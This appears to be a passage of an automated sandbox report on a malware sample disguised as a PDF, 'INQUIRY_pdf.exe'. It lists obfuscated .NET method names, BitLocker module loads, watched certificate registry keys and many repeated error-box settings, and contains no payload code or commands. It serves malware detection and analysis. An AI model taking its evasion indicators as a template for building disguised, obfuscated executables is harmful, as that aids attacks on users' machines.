Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, U0QRHoreoe8VjYxh036.cs	High entropy of concatenated method names: 'ToString', 'slZ4tXLOca', 'KfU45q3ygI', 'JVs4aI4Zl6', 'Oo74ol5qWJ', 'w8n4g9GFEN', 'IUw4COhOZs', 'ytC4F8bTlZ', 'U0rYaBNHrrm3di0pGNZ', 'aeFBPDNKwvGwRBiYMPj'
Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, EiaXqScrEmvLxvcHvM.cs	High entropy of concatenated method names: 'CVElGZY93t', 'goClEBjqbB', 'iw2lc3Lk1n', 'qKslQMbeTO', 'iQslgyuNZS', 'c3NlCFiRay', 'Cm2lFnXNEZ', 'eval0LE0tT', 'fmPlJkUH3M', 'KKGlOvJ3ha'
Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, Mh4FlCOiOiCY7CRjOQ.cs	High entropy of concatenated method names: 'sY9AT8uHj8', 'YlYASl6I8p', 'gr1ARmK006', 'OkPRK6tMoB', 'acCRzDfRo8', 'GUUAymX8AB', 'QouArw3U4k', 'wDIAeMobCe', 'eT6ANyM0Cf', 'jBiAnXlTwL'
Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, s62PwJ7pQ7Snf9UoVN.cs	High entropy of concatenated method names: 'ToString', 'rwawWpG5Bu', 'fnXwg1n73U', 'EE1wCxMWVx', 'sxswF4Pw23', 'zwew0HJGjR', 'EDCwJp8b4V', 'd4XwOjTaql', 'FY6wISdZMa', 'CiUwvOXUMH'
Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, Kvr4meocxUah26ePNb.cs	High entropy of concatenated method names: 'FJWRUGdsT2', 'gZWRxEF2yg', 'OAZRLUAQVX', 'Y4vRAQAmDQ', 'xdlRs1r0rq', 'UkbLplSSCy', 'to4LVCDC7B', 'Y1sLZLVI1W', 'rtGLqkqV2g', 'tgiLYcdbjF'
Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, BjY7kWYZ1AgjC6ymmv.cs	High entropy of concatenated method names: 'tjx2oxuKXQ', 'PxK2gKyY5y', 'zkc2CS4oQV', 'sqs2FjH6ZY', 'G2O20MHkCi', 'Etj2JS7sVR', 'quS2O63FAI', 'KPt2IhRkhh', 'GFb2vUmVUF', 'QWM2GPE2cF'
Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, mDUSrLeirNp8wmCvpl.cs	High entropy of concatenated method names: 'a3K9YpDKD', 'wiOBuQSf9', 'TWq6lVhMO', 'aLh3rAjwt', 'TK355bLVG', 'O18aE1wRx', 'HlmuUBIBdBK1BKAyaA', 'TMo7n0G4v91PnEINDb', 'prxbqERyT', 'S9cfHTe1F'
Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, Jb4wsGa9CVJWfXQZDi.cs	High entropy of concatenated method names: 'TSOLXj8OIg', 'vfBL3BA1mE', 'ug4SCENKkt', 'm1GSFalPaZ', 'dxVS0jT2lV', 'tbrSJqIPFK', 'EeOSOYNp46', 'oTYSIlGYy4', 'rR5SvrjVp7', 'a7GSGyAaI6'
Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, yZvSisnnuOZwOhmaGA.cs	High entropy of concatenated method names: 'OHRrA7FUjI', 'S08rsboJ4k', 'VLyrkL1v4t', 'RrEr8Q0b4w', 'BQZrlDiJvr', 'tmerwcxUah', 'pbe7WG1mUbfFjGKF8N', 'HMv1Mj5V1tCuABKuWj', 'NaQrrDcgDe', 'BrVrNXL1Ki'
Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, pZsuQJZK8DxX9NafoU.cs	High entropy of concatenated method names: 'L1A2lGInaR', 'OUO2mxIsFM', 'mvc221spOx', 'Xvs248QsOS', 'LrO2dT8gZZ', 'Tgq21mhpYo', 'Dispose', 'bOVbTpFlOB', 'TNobxNkuaO', 'wDfbStBWbP'
Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, i7FUjIt708boJ4kPOi.cs	High entropy of concatenated method names: 'bHjxcOvuPB', 'dc6xQQm88I', 'eUlx7WVQf6', 'YKmxP8tJIu', 'CgMxp8AdPv', 'e52xV6NQv8', 'PmOxZiVhYh', 'pc1xqde78w', 'NhVxYvHgKX', 'vbfxKNGwwv'
Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, luZ6Wszm1kpfJ86lWX.cs	High entropy of concatenated method names: 'MJ8f6n3Pf9', 'LhuftHphmg', 'Ws2f5jD9C2', 'nQrfoDT89O', 'jMVfgQFoO8', 'eOpfFaf58m', 'KJIf0jq9kf', 'BKsf19J9MM', 'PQ4fHMR6ZW', 'abWfM7F6ql'
Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, MZsxJ1rnS9tFSlbwy9d.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'r2Yu2GnAXh', 'fL5uf52FqS', 'ziuu4lSssa', 'nY9uu9gjaI', 'Jf6udrLwXN', 'Veauj6YSDW', 'NDYu15PoVH'
Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, nXtVtaKhaDMCXA3pfM.cs	High entropy of concatenated method names: 'I9ifSPsAYr', 'fiofLYVU3r', 'RGPfRJvA6y', 'BHYfASCONw', 'wInf2nYEHa', 'uMqfsiR4lY', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.INQUIRY_pdf.exe.7d00000.4.raw.unpack, TvTdlWx3cBDq2et81U.cs	High entropy of concatenated method names: 'Dispose', 'lxXrY9Nafo', 'XU4egYXhGN', 'b61a2DTGSt', 'eJ4rKIMKQm', 'Oitrz4vgPM', 'ProcessDialogKey', 'etXeyjY7kW', 'V1AergjC6y', 'qmveehXtVt'
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, txedKMryF6wYwZKkGE6.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zvtfWl5Vc5', 's7JfE41bcW', 'JfVfio1dHi', 'rrRfchaBiq', 'pYvfQ2IrO9', 'wuBf70Wn3F', 'aUmfPLckNp'
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, mpKrITvPprZVQf913B.cs	High entropy of concatenated method names: 'YO1AHdS2NO', 'FFOAMZW5yU', 'cLTA9yysMK', 'NvbABDxOa0', 'ro3AXr5svv', 'TBnA6FSXx9', 'e0RA3e3tqH', 'IicAt8pXa8', 'uTvA5U0jY4', 'LgPAaMEuo6'
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, scGOCV5LyL1v4tQrEQ.cs	High entropy of concatenated method names: 'IdsSBNmAST', 'ktvS67JSvh', 'NGWSt3701E', 'RR5S5cM63h', 'Qe7SlgddHA', 'hFtSw5WqkI', 'aJySmLQUyH', 'RdqSbSA60R', 'lVnS2Q3UQf', 'pINSfN1jCu'
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, WytqDWV6MeUIjEhnkW.cs	High entropy of concatenated method names: 'S1JmqHfj6T', 'SJGmK9lodg', 'QTIbyM1Dhp', 'K07br951Op', 'TscmW3XXRT', 'JfTmErXEdu', 'mommiKZ6lx', 'SYnmcu1lU6', 'Bk2mQemQ5y', 'qFgm7GrGQE'
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, uxPUncimL7unLtP6tA.cs	High entropy of concatenated method names: 'yDFht8J4MN', 'u23h53DLgl', 'f5Iho8AHZC', 'Nu0hg2FSM9', 'KWbhFr8nOt', 'gLoh0Hq0qK', 'cTChOftOgI', 'U6ZhIJQuiF', 'jKkhGk3dkJ', 'y8UhWAr2yw'
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, TnNptTrrOdK87Xbw3xR.cs	High entropy of concatenated method names: 'nvAfKZmmyi', 'BUkfzVS3pc', 'E8J4yy27Br', 'AJ04r6jMEg', 'vsX4epoFgJ', 'UQf4Nf55fi', 'Ynj4niODap', 'DuF4Uau6xn', 'kIN4TdgIEI', 'UP74x21lCW'
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, UK6wFwsYsT6P1k0iZy.cs	High entropy of concatenated method names: 'z7ONUG9T3m', 'oxRNTbQotv', 'BcXNxAyub5', 'rl9NSHRnYB', 'H8ONLqVy0S', 'gQvNRVqbYx', 'EMUNAJX7fN', 'sj5Ns3bSL2', 'konNDBWFRL', 'LQZNkB5q2v'
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, xN0vcYP0IiMwJXOaIy.cs	High entropy of concatenated method names: 'z5rmknDrsD', 'O1wm8CF1CV', 'ToString', 'TaomT4AfsR', 'rwVmxIv6DA', 'mWFmSNn7y7', 'eMmmL4JoQN', 'r3RmRA8sxV', 'KHPmAbQ3by', 'wbYmshsAjj'
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, U0QRHoreoe8VjYxh036.cs	High entropy of concatenated method names: 'ToString', 'slZ4tXLOca', 'KfU45q3ygI', 'JVs4aI4Zl6', 'Oo74ol5qWJ', 'w8n4g9GFEN', 'IUw4COhOZs', 'ytC4F8bTlZ', 'U0rYaBNHrrm3di0pGNZ', 'aeFBPDNKwvGwRBiYMPj'
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, EiaXqScrEmvLxvcHvM.cs	High entropy of concatenated method names: 'CVElGZY93t', 'goClEBjqbB', 'iw2lc3Lk1n', 'qKslQMbeTO', 'iQslgyuNZS', 'c3NlCFiRay', 'Cm2lFnXNEZ', 'eval0LE0tT', 'fmPlJkUH3M', 'KKGlOvJ3ha'
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, Mh4FlCOiOiCY7CRjOQ.cs	High entropy of concatenated method names: 'sY9AT8uHj8', 'YlYASl6I8p', 'gr1ARmK006', 'OkPRK6tMoB', 'acCRzDfRo8', 'GUUAymX8AB', 'QouArw3U4k', 'wDIAeMobCe', 'eT6ANyM0Cf', 'jBiAnXlTwL'
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, s62PwJ7pQ7Snf9UoVN.cs	High entropy of concatenated method names: 'ToString', 'rwawWpG5Bu', 'fnXwg1n73U', 'EE1wCxMWVx', 'sxswF4Pw23', 'zwew0HJGjR', 'EDCwJp8b4V', 'd4XwOjTaql', 'FY6wISdZMa', 'CiUwvOXUMH'
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, Kvr4meocxUah26ePNb.cs	High entropy of concatenated method names: 'FJWRUGdsT2', 'gZWRxEF2yg', 'OAZRLUAQVX', 'Y4vRAQAmDQ', 'xdlRs1r0rq', 'UkbLplSSCy', 'to4LVCDC7B', 'Y1sLZLVI1W', 'rtGLqkqV2g', 'tgiLYcdbjF'
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, BjY7kWYZ1AgjC6ymmv.cs	High entropy of concatenated method names: 'tjx2oxuKXQ', 'PxK2gKyY5y', 'zkc2CS4oQV', 'sqs2FjH6ZY', 'G2O20MHkCi', 'Etj2JS7sVR', 'quS2O63FAI', 'KPt2IhRkhh', 'GFb2vUmVUF', 'QWM2GPE2cF'
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, mDUSrLeirNp8wmCvpl.cs	High entropy of concatenated method names: 'a3K9YpDKD', 'wiOBuQSf9', 'TWq6lVhMO', 'aLh3rAjwt', 'TK355bLVG', 'O18aE1wRx', 'HlmuUBIBdBK1BKAyaA', 'TMo7n0G4v91PnEINDb', 'prxbqERyT', 'S9cfHTe1F'
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, Jb4wsGa9CVJWfXQZDi.cs	High entropy of concatenated method names: 'TSOLXj8OIg', 'vfBL3BA1mE', 'ug4SCENKkt', 'm1GSFalPaZ', 'dxVS0jT2lV', 'tbrSJqIPFK', 'EeOSOYNp46', 'oTYSIlGYy4', 'rR5SvrjVp7', 'a7GSGyAaI6'
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, yZvSisnnuOZwOhmaGA.cs	High entropy of concatenated method names: 'OHRrA7FUjI', 'S08rsboJ4k', 'VLyrkL1v4t', 'RrEr8Q0b4w', 'BQZrlDiJvr', 'tmerwcxUah', 'pbe7WG1mUbfFjGKF8N', 'HMv1Mj5V1tCuABKuWj', 'NaQrrDcgDe', 'BrVrNXL1Ki'
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, pZsuQJZK8DxX9NafoU.cs	High entropy of concatenated method names: 'L1A2lGInaR', 'OUO2mxIsFM', 'mvc221spOx', 'Xvs248QsOS', 'LrO2dT8gZZ', 'Tgq21mhpYo', 'Dispose', 'bOVbTpFlOB', 'TNobxNkuaO', 'wDfbStBWbP'
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, i7FUjIt708boJ4kPOi.cs	High entropy of concatenated method names: 'bHjxcOvuPB', 'dc6xQQm88I', 'eUlx7WVQf6', 'YKmxP8tJIu', 'CgMxp8AdPv', 'e52xV6NQv8', 'PmOxZiVhYh', 'pc1xqde78w', 'NhVxYvHgKX', 'vbfxKNGwwv'
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, luZ6Wszm1kpfJ86lWX.cs	High entropy of concatenated method names: 'MJ8f6n3Pf9', 'LhuftHphmg', 'Ws2f5jD9C2', 'nQrfoDT89O', 'jMVfgQFoO8', 'eOpfFaf58m', 'KJIf0jq9kf', 'BKsf19J9MM', 'PQ4fHMR6ZW', 'abWfM7F6ql'
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, MZsxJ1rnS9tFSlbwy9d.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'r2Yu2GnAXh', 'fL5uf52FqS', 'ziuu4lSssa', 'nY9uu9gjaI', 'Jf6udrLwXN', 'Veauj6YSDW', 'NDYu15PoVH'
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, nXtVtaKhaDMCXA3pfM.cs	High entropy of concatenated method names: 'I9ifSPsAYr', 'fiofLYVU3r', 'RGPfRJvA6y', 'BHYfASCONw', 'wInf2nYEHa', 'uMqfsiR4lY', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.INQUIRY_pdf.exe.3e23d60.2.raw.unpack, TvTdlWx3cBDq2et81U.cs	High entropy of concatenated method names: 'Dispose', 'lxXrY9Nafo', 'XU4egYXhGN', 'b61a2DTGSt', 'eJ4rKIMKQm', 'Oitrz4vgPM', 'ProcessDialogKey', 'etXeyjY7kW', 'V1AergjC6y', 'qmveehXtVt'

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\INQUIRY_pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
